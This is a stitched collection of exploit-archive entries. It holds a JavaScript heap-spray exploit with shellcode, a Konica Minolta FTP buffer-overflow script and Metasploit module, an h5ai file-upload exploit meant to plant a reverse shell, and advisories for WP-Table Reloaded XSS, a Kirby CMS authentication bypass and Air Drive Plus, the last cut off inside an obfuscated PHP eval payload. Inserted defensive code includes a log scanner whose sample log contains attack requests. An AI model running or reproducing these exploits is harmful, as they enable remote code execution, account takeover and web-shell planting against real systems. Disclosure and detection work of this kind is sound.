if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
}
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
"");
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
heap_obj.uYiBaSLpjlOJJdhFAb(block);
}
ctrl.InvokeContact(202116108)
</script>
</html>
source: https://www.securityfocus.com/bid/57664/info
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
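As an added defensive example (not part of any advisory above), a Python access-log scanner whose rules are derived from the request patterns quoted for DigiLIBE, gpEasy, the Chocolate WP theme, Pligg, iCart Pro, the ADH-Web cameras, Hunt CCTV and WP-Table Reloaded. The log lines, rule names and path patterns are constructed assumptions; the paths should be adapted to where these components are actually installed.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed Apache-style access log lines (not from a real server), modelled
# on the request URLs quoted in the advisories above; two lines are benign.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Feb/2013:10:01:02 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2013:10:01:03 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=images/logo.jpg&w=100 HTTP/1.1" 200 8812
10.0.0.5 - - [12/Feb/2013:10:01:04 +0000] "GET /wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg HTTP/1.1" 200 512
10.0.0.6 - - [12/Feb/2013:10:02:10 +0000] "GET /pligg/load_data_for_search.php?sql=SELECT%20sleep(10) HTTP/1.1" 200 40
10.0.0.7 - - [12/Feb/2013:10:03:11 +0000] "GET /forum/icart.php?do=editproduct&productid=19&section=' HTTP/1.1" 500 120
10.0.0.8 - - [12/Feb/2013:10:04:12 +0000] "GET /variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 HTTP/1.1" 200 30
10.0.0.8 - - [12/Feb/2013:10:04:13 +0000] "GET /hdd0/logs/seclog.log HTTP/1.1" 200 9000
10.0.0.9 - - [12/Feb/2013:10:05:14 +0000] "GET /DVR.cfg HTTP/1.1" 200 4096
10.0.0.9 - - [12/Feb/2013:10:06:15 +0000] "GET /wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}// HTTP/1.1" 200 700
10.0.0.10 - - [12/Feb/2013:10:07:16 +0000] "GET //?cmd=new_section&section=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.11 - - [12/Feb/2013:10:08:17 +0000] "GET /digilibe/configuration/general_configuration.html HTTP/1.1" 200 2200
10.0.0.12 - - [12/Feb/2013:10:09:18 +0000] "GET /index.php HTTP/1.1" 200 1200
"""


def _has_sql_meta(value):
    """Quote, comment or SQL keyword in a parameter that should be numeric/plain."""
    return re.search(r"'|--|/\*|\b(select|union|sleep|benchmark)\b", value, re.I) is not None


def _has_script(value):
    """Tag, event handler or JS call in a parameter that should never carry markup."""
    return re.search(r"<\s*\w|\bon\w+\s*=|\b(alert|catch|eval)\s*\(", value, re.I) is not None


def _remote_or_non_image(value):
    """thumb.php src that is a remote URL, not an image name, or carries markup."""
    return (re.match(r"\s*(https?:)?//", value, re.I) is not None
            or re.search(r"\.(jpe?g|png|gif)$", value, re.I) is None
            or _has_script(value))


# (rule name, regex on the decoded path, predicate on the parsed query dict)
RULES = [
    ("DigiLIBE general_configuration.html reached",
     r"/configuration/general_configuration\.html$", lambda q: True),
    ("gpEasy new_section XSS", r"^/+$|/index\.php$",
     lambda q: "new_section" in q.get("cmd", []) and any(_has_script(v) for v in q.get("section", []))),
    ("Chocolate theme thumb.php remote or scripted src", r"/dt-chocolate/thumb\.php$",
     lambda q: any(_remote_or_non_image(v) for v in q.get("src", []))),
    ("Pligg raw SQL in sql parameter", r"/load_data_for_search\.php$", lambda q: "sql" in q),
    ("iCart Pro SQL metacharacters", r"/icart\.php$",
     lambda q: any(_has_sql_meta(v) for k in ("productid", "section") for v in q.get(k, []))),
    ("ADH-Web sensitive variable.cgi read", r"/variable\.cgi$",
     lambda q: any(re.match(r"(console_master_ftp|dhcp_dns|camconfig|alarm_)", v) for v in q.get("variable", []))),
    ("ADH-Web direct log file access", r"^/hdd0/logs/.", lambda q: True),
    ("Hunt CCTV DVR.cfg download", r"/DVR\.cfg$", lambda q: True),
    ("WP-Table Reloaded zeroclipboard.swf id injection", r"/zeroclipboard\.swf$",
     lambda q: any(_has_script(v) or re.search(r"[)}\"\\]", v) is not None for v in q.get("id", []))),
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_request(line):
    """Split one combined-log line into client, method, decoded path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    # Split on the first '?' ourselves: urlsplit would read a leading '//' as a host.
    path, _, qs = target.partition("?")
    return {"ip": ip, "time": ts, "method": method, "path": unquote(path),
            "query": parse_qs(qs, keep_blank_values=True), "status": int(status)}


def scan_log(text):
    """Run every rule over every line; return (client ip, rule name) pairs in log order."""
    alerts = []
    for line in text.strip().splitlines():
        req = parse_request(line)
        if req is None:
            continue
        for name, path_re, query_pred in RULES:
            if re.search(path_re, req["path"]) and query_pred(req["query"]):
                alerts.append((req["ip"], name))
    return alerts


if __name__ == "__main__":
    for ip, name in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{name}")
```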
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
      'Description'    => %q{
        This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
        leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
        credentials are typically unnecessary to exploit this vulnerability.
      },
      'Author'         =>
        [
          'Shankar Damodaran', # stack buffer overflow dos p.o.c
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '37908' ] # reference type is 'EDB' (Exploit-DB); the original had the typo 'EBD'
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1500,
          'BadChars'    => "\x00\x0a\x2f\x5c",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 7 SP1 x86',
            {
              'Ret'    => 0x12206d9d, # ppr - KMFtpCM.dll
              'Offset' => 1037
            }
          ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'DefaultTarget'  => 0))
  end

  def check
    connect
    disconnect
    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    connect_login
    buf = rand_text(target['Offset'])
    buf << generate_seh_record(target.ret)
    buf << payload.encoded
    buf << rand_text(3000)
    print_status("Sending exploit buffer...")
    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
    handler
    disconnect
  end
end
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file-based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows authentication to be bypassed in a hosting
environment where users within the same shared environment can write and read files
in a directory accessible to both the victim and the attacker.
IV. DESCRIPTION
-------------------------
As KirbyCMS is a file-based CMS, it also stores authentication data
in files in the accounts directory; each user has their own password file, such as:
kirby/site/accounts/[username].php
At login, KirbyCMS reads the password file to verify the password hash.
During this process it fails to validate the resulting path to ensure that the login
variable supplied by the user does not contain path traversal sequences such as '../'.
This makes it vulnerable to a path traversal attack and allows the authentication to be
bypassed if an attacker is located in the same multi-user hosting environment and can
write files to a public directory, such as /tmp, that is accessible to the victim's
KirbyCMS site.
The exact code responsible for this vulnerability is located in
kirby/core/user.php file and is shown below:
---[ kirby/core/user.php ]---
abstract class UserAbstract {

  protected $username = null;
  protected $cache    = array();
  protected $data     = null;

  public function __construct($username) {
    $this->username = str::lower($username);

    // check if the account file exists
    if(!file_exists($this->file())) {
      throw new Exception('The user account could not be found');
    }
    ...
  }

  protected function file() {
    return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
  }
-----------------------------
In addition to the authentication bypass KirbyCMS was found to allow
authentication over HTTP protocol (resulting in passwords being sent
unencrypted), and to never expire authenticated sessions.
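Added example, not Kirby's code: the account-file lookup from the excerpt above, modelled in C, with the validation the advisory says is missing. account_file_unsafe mirrors the PHP concatenation (root . DS . lower(username) . '.php'); account_file_safe allowlists the username first, so a name carrying path separators or '..' never reaches the file system. The function names, the 64-character limit and the allowlist are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_USERNAME 64   /* assumed limit for this example; Kirby sets none */

/* Lowercases src into dst (the str::lower step). Returns -1 if it does not fit. */
static int lower_copy(char *dst, size_t dstlen, const char *src) {
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[n] = '\0';
    return 0;
}

/* Mirrors UserAbstract::file() from the advisory: root "/" lower(username) ".php"
 * with no validation, so a username of "../x" yields "<root>/../x.php". */
int account_file_unsafe(const char *accounts_root, const char *username,
                        char *out, size_t outlen) {
    char name[MAX_USERNAME + 1];
    if (lower_copy(name, sizeof name, username) < 0)
        return -1;
    int w = snprintf(out, outlen, "%s/%s.php", accounts_root, name);
    return (w < 0 || (size_t)w >= outlen) ? -1 : 0;
}

/* Hardened lookup. The username becomes a single file name, so only characters that
 * cannot start another path component are accepted: [A-Za-z0-9._-]. Also rejected:
 * empty names, names longer than MAX_USERNAME, a leading '.', and any ".." sequence. */
int account_file_safe(const char *accounts_root, const char *username,
                      char *out, size_t outlen) {
    size_t n = strlen(username);
    if (n == 0 || n > MAX_USERNAME || username[0] == '.')
        return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)username[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return -1;                       /* '/', '\\', NUL, controls, non-ASCII */
        if (c == '.' && username[i + 1] == '.')
            return -1;                       /* parent-directory reference */
    }
    if (account_file_unsafe(accounts_root, username, out, outlen) < 0)
        return -1;
    /* Defence in depth: the built path must sit directly under the accounts root,
     * i.e. exactly one path component after "<root>/". */
    size_t rootlen = strlen(accounts_root);
    if (strncmp(out, accounts_root, rootlen) != 0 || out[rootlen] != '/' ||
        strchr(out + rootlen + 1, '/') != NULL)
        return -1;
    return 0;
}

/* Helpers for callers and tests, using the advisory's accounts directory. */
static const char *ROOT = "/sites/victim/kirby/site/accounts";

int username_accepted(const char *username) {
    char path[512];
    return account_file_safe(ROOT, username, path, sizeof path) == 0;
}

/* 1 if the unvalidated build produces a path containing "/../" (i.e. escapes the root). */
int unsafe_path_has_traversal(const char *username) {
    char path[512];
    if (account_file_unsafe(ROOT, username, path, sizeof path) < 0)
        return 0;
    return strstr(path, "/../") != NULL;
}

int main(void) {
    const char *names[] = { "Victim", "john.doe", "a/b", "a..b",
                            "../../../../../../../../tmp/bypassauth" };
    char path[512];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int u = account_file_unsafe(ROOT, names[i], path, sizeof path);
        printf("unsafe: %-40s -> %s\n", names[i], u == 0 ? path : "(error)");
        int s = account_file_safe(ROOT, names[i], path, sizeof path);
        printf("safe:   %-40s -> %s\n", names[i], s == 0 ? path : "rejected");
    }
    return 0;
}
```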
V. PROOF OF CONCEPT
-------------------------
KirbyCMS stores credentials in the kirby/site/accounts directory as PHP files
so that their contents cannot be accessed directly via the web server.
An example file with credentials looks as follows:
---[ victimuser.php ]---
<?php if(!defined('KIRBY')) exit ?>
username: victim
email: victim@mailserver.com
password: >
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin
------------------------
To bypass the authentication, an attacker who has an account in the same
hosting environment as the victim can write the above credentials file,
which contains a hash of the password 'trythisout',
into a public directory such as:
/tmp/bypassauth.php
Because of the aforementioned path traversal vulnerability the attacker
can then use these credentials to log in as an administrator
(via: http://victim-server.com/kirby/panel/login) with:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
which will produce an HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause KirbyCMS to load credentials from the path:
/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php
As a result, the attacker will get the following response:
<h2 class="hgroup hgroup-single-line cf">
<span class="hgroup-title">
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
</span>
<span class="hgroup-options shiv shiv-dark shiv-left">
and thereby gain access to the KirbyCMS control panel with admin rights.
VI. BUSINESS IMPACT
-------------------------
Users who make use of vulnerable versions of KirbyCMS in shared hosting
environments are at risk of having their website modified by unauthorized users.
An attacker who manages to log in as an administrator will be able to change
all the existing content as well as upload new files.
This attack could be combined with the 'CSRF Content Upload and PHP Script
Execution' vulnerability, also discovered by Dawid Golunski and described in a
separate document.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the vulnerability an attacker must be able to write a malicious
credentials file into a public directory on the system that is accessible to the
victim KirbyCMS site. This is a common situation in many hosting environments
that allow files to be written to and read from temporary directories such as /tmp
or /var/tmp.
Such a file could also be placed on the server by other means, even if the attacker
does not have an account on it, for example via anonymous FTP or an email attachment
that gets saved to a temporary file on the server.
VIII. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1, released by the vendor in response to this advisory.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
14.09.2015 - Final
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
#!/usr/bin/env python
# Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
# Date: 21 September 2015
# Exploit Author: rTheory
# Vendor Homepage: https://larsjung.de/h5ai/
# Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
# Vulnerable Versions: 0.22.0 - 0.24.1
# Tested on: 0.24.0 running on Apache
# CVE : 2015-3203
import urllib
import urllib2
import socket
import os
import getopt
import sys

# Globals with default options
url = ''
path = '/'
fileName = ''
filePath = ''
verboseMode = False


def header():
    print '+-----------------------------------------------+'
    print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
    print '| See CVE-2015-3203 for vulnerability details   |'
    print '+------------------- rTheory -------------------+'


def usage():
    print
    print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
    print '-t --target  - The URL to connect to'
    print '                 ex: http://example.com'
    print '-f --file    - The file to upload'
    print '                 ex: php-reverse-shell.php'
    print '-p --path    - The path to upload to'
    print '                 Default is \'/\''
    print '-v --verbose - Enable more verbose output'
    print
    print 'Examples:'
    print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
    print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
    sys.exit(0)


def main():
    global url
    global path
    global fileName
    global filePath
    global verboseMode
    header()
    if not len(sys.argv[4:]):
        print '[-] Incorrect number of arguments'
        usage()
    try:
        # long options that take a value need a trailing '=' for getopt
        opts, args = getopt.getopt(sys.argv[1:], "ht:f:p:v",
                                   ["help", "target=", "file=", "path=", "verbose"])
    except getopt.GetoptError as err:
        print str(err)
        usage()
    for o, a in opts:
        if o in ('-h', '--help'):
            usage()
        elif o in ('-t', '--target'):
            url = a
        elif o in ('-f', '--file'):
            fileName = a
        elif o in ('-p', '--path'):
            path = a
        elif o in ('-v', '--verbose'):
            verboseMode = True
        else:
            assert False, "Unhandled Option"
    # Test target URL, target file, and path inputs for validity
    if not url.startswith('http'):
        print '[-] Error: Target URL must start with http:// or https://'
        usage()
    if not os.path.isfile(fileName):
        print '[-] Error: File does not appear to exist'
        usage()
    if not (path.startswith('/') and path.endswith('/')):
        print '[-] Error: Path must start and end with a \'/\''
        usage()
    # Determine target host, which is the URL minus the leading protocol
    if url.find('http://') != -1:
        host = url[7:]
    elif url.find('https://') != -1:
        host = url[8:]
    else:
        host = url
    # Store the contents of the upload file into a string
    print '[+] Reading upload file'
    f = open(fileName, 'r')
    fileContents = f.read()
    f.close()
    MPFB = 'multipartformboundary1442784669030'  # constant string used for MIME info
    # Header information. Content-Length not needed.
    http_header = {
        "Host": host,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-us,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-type": "multipart/form-data; boundary=------" + MPFB,
        "X-Requested-With": "XMLHttpRequest",
        "Referer": url + path,
        "Connection": "keep-alive"
    }
    # POST parameter for file upload
    payload = '--------' + MPFB + '\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
    payload += '--------' + MPFB + '\r\nContent-Disposition: form-data; name="href"\r\n\r\n' + path + '\r\n'
    payload += '--------' + MPFB + '\r\nContent-Disposition: form-data; name="userfile"; filename="' + fileName + '"\r\nContent-Type: \r\n\r\n' + fileContents + '\r\n'
    payload += '--------' + MPFB + '--\r\n'
    socket.setdefaulttimeout(5)
    opener = urllib2.build_opener()
    req = urllib2.Request(url, payload, http_header)
    # submit request and print output. Expected: "code 0"
    try:
        print '[+] Sending exploit POST request'
        res = opener.open(req)
        html = res.read()
        if verboseMode:
            print '[+] Server returned: ' + html
    except:
        print '[-] Socket timed out, but it might still have worked...'
    # close the connection
    opener.close()
    # Last step: check to see if the file uploaded (performed outside of this function)
    filePath = url + path + fileName
    print '[+] Checking to see if the file uploaded:'
    print '[+] ' + filePath


def postCheck():
    # Check to see if the file exists
    # This may work now that everything from main() was torn down
    global filePath
    try:
        urllib2.urlopen(filePath)
        print '[+] File uploaded successfully!'
    except urllib2.HTTPError, e:
        print '[-] File did not appear to upload'
    except urllib2.URLError, e:
        print '[-] File did not appear to upload'


main()
postCheck()
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597
Release Date:
=============
2015-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1597
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.
(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to include unauthorized local file/path requests
or system-specific path commands in order to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject their own files with
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include
execution occurs in the index file directory listing and the sub-folders of the wifi interface. The attacker is able to inject the lfi payload
through the wifi interface or the local file sync function.
Attackers are also able to exploit the filename issue in combination with persistently injected script code to execute different malicious
attack requests. The attack vector is located on the application side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in compromise of the mobile application or of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.
For a security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png
PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
POST-Daten:
POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
